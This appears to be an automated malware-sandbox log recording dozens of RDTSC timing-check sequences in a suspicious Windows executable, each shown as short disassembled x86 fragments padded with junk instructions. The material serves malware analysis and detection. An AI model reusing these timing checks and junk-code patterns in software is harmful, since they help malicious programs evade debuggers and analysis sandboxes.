Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73CD9 second address: E73CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73CDE second address: E73CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73CE4 second address: E73CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73DF2 second address: E73DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7465B second address: E746B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F17B0EA9AB8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dl, 99h 0x00000026 lea eax, dword ptr [ebp+124980FEh] 0x0000002c sub dword ptr [ebp+122D3212h], ebx 0x00000032 nop 0x00000033 jp 00007F17B0EA9ABEh 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E746B9 second address: E746FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F17B0FD572Fh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 sub ecx, 23B02D9Ah 0x00000017 lea eax, dword ptr [ebp+124980BAh] 0x0000001d jl 00007F17B0FD572Ch 0x00000023 mov edi, 3B8A1FCCh 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push ebx 0x0000002c jnl 00007F17B0FD5726h 0x00000032 pop ebx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E746FC second address: E4F722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c js 00007F17B0EA9ABCh 0x00000012 mov dword ptr [ebp+122D327Bh], ebx 0x00000018 call dword ptr [ebp+122D324Eh] 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 ja 00007F17B0EA9AB6h 0x00000027 jmp 00007F17B0EA9AC4h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4F722 second address: E4F73E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD5735h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4F73E second address: E4F77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jns 00007F17B0EA9AB6h 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F17B0EA9AC9h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F17B0EA9AC3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4F77C second address: E4F79D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD5737h 0x00000007 jl 00007F17B0FD5726h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4F79D second address: E4F7AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9ABBh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7421 second address: EA7432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F17B0FD572Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7A30 second address: EA7A88 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnp 00007F17B0EA9AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F17B0EA9ABEh 0x00000012 pushad 0x00000013 jmp 00007F17B0EA9AC5h 0x00000018 jno 00007F17B0EA9AB6h 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F17B0EA9AC7h 0x00000026 jbe 00007F17B0EA9ABCh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7BF5 second address: EA7C23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD572Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F17B0FD573Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7C23 second address: EA7C4A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F17B0EA9ACFh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7C4A second address: EA7C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7DAC second address: EA7DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7DB2 second address: EA7DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7DBB second address: EA7DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7DBF second address: EA7DC9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17B0FD5726h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7DC9 second address: EA7DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 jg 00007F17B0EA9AB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA9A11 second address: EA9A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA9A1C second address: EA9A50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9ABFh 0x00000007 jmp 00007F17B0EA9AC9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA9A50 second address: EA9A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E23D77 second address: E23D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0EA9ABDh 0x00000009 popad 0x0000000a jmp 00007F17B0EA9AC4h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E23D9D second address: E23DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E23DA3 second address: E23DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E23DA9 second address: E23DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAF2F5 second address: EAF312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAE064 second address: EAE068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAE1BB second address: EAE1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAE7B5 second address: EAE7D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD5733h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAE7D0 second address: EAE7D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAEFA3 second address: EAEFA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAEFA8 second address: EAEFAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAEFAE second address: EAEFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4EEE second address: EB4EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4EF2 second address: EB4EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB3BC9 second address: EB3BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F17B0EA9AB6h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F17B0EA9AC1h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB3D22 second address: EB3D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB3D26 second address: EB3D40 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F17B0EA9AB6h 0x00000008 jp 00007F17B0EA9AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007F17B0EA9ABEh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB3E7D second address: EB3E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB3E83 second address: EB3E87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB42B7 second address: EB42C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F17B0FBC26Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4577 second address: EB457B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB457B second address: EB4583 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4583 second address: EB4588 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4CEB second address: EB4D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F17B0FBC26Bh 0x0000000b jg 00007F17B0FBC285h 0x00000011 jmp 00007F17B0FBC26Eh 0x00000016 jmp 00007F17B0FBC271h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4D25 second address: EB4D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4D2B second address: EB4D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4D2F second address: EB4D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB90B1 second address: EB90D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0FBC274h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB90D0 second address: EB90D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB8907 second address: EB890D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB890D second address: EB8911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB8BBD second address: EB8BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F17B0FBC26Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB8BDA second address: EB8BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F17B0CB1431h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EBB52A second address: EBB52E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EBB52E second address: EBB532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E1D171 second address: E1D175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E1D175 second address: E1D184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F17B0CB1426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E1D184 second address: E1D19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F17B0FBC266h 0x0000000a jmp 00007F17B0FBC26Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E1D19A second address: E1D1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F17B0CB142Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC0761 second address: EC0791 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F17B0FBC26Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F17B0FBC26Ch 0x00000011 jng 00007F17B0FBC266h 0x00000017 push edx 0x00000018 jns 00007F17B0FBC266h 0x0000001e pop edx 0x0000001f pushad 0x00000020 jnc 00007F17B0FBC266h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC0BBC second address: EC0BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC0BC0 second address: EC0BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC0BC4 second address: EC0BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC5D6E second address: EC5D74 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC5032 second address: EC503A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC503A second address: EC503E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC503E second address: EC5042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC5042 second address: EC507D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0FBC26Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F17B0FBC26Eh 0x00000019 jl 00007F17B0FBC270h 0x0000001f jmp 00007F17B0FBC26Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC507D second address: EC5096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F17B0CB1426h 0x0000000a jmp 00007F17B0CB142Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC5096 second address: EC50C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F17B0FBC273h 0x0000000f jmp 00007F17B0FBC26Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC561E second address: EC5632 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F17B0CB1436h 0x00000008 jmp 00007F17B0CB142Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC575A second address: EC576E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F17B0FBC266h 0x00000008 jns 00007F17B0FBC266h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC576E second address: EC5772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC5772 second address: EC577C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC591B second address: EC5938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Bh 0x00000009 jmp 00007F17B0CB142Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ECB2BB second address: ECB2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F17B0FBC266h 0x0000000f jmp 00007F17B0FBC276h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ECAAE9 second address: ECAAED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ECAAED second address: ECAB0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F17B0FBC277h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E25813 second address: E25817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E25817 second address: E2581D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED0CEC second address: ED0CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F17B0CB1426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED1183 second address: ED1193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F17B0FBC268h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED1193 second address: ED119D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F17B0CB1426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED119D second address: ED11A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED11A1 second address: ED11AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED1F0F second address: ED1F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0FBC26Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F17B0FBC275h 0x00000010 jp 00007F17B0FBC266h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED1F40 second address: ED1F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F17B0CB142Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
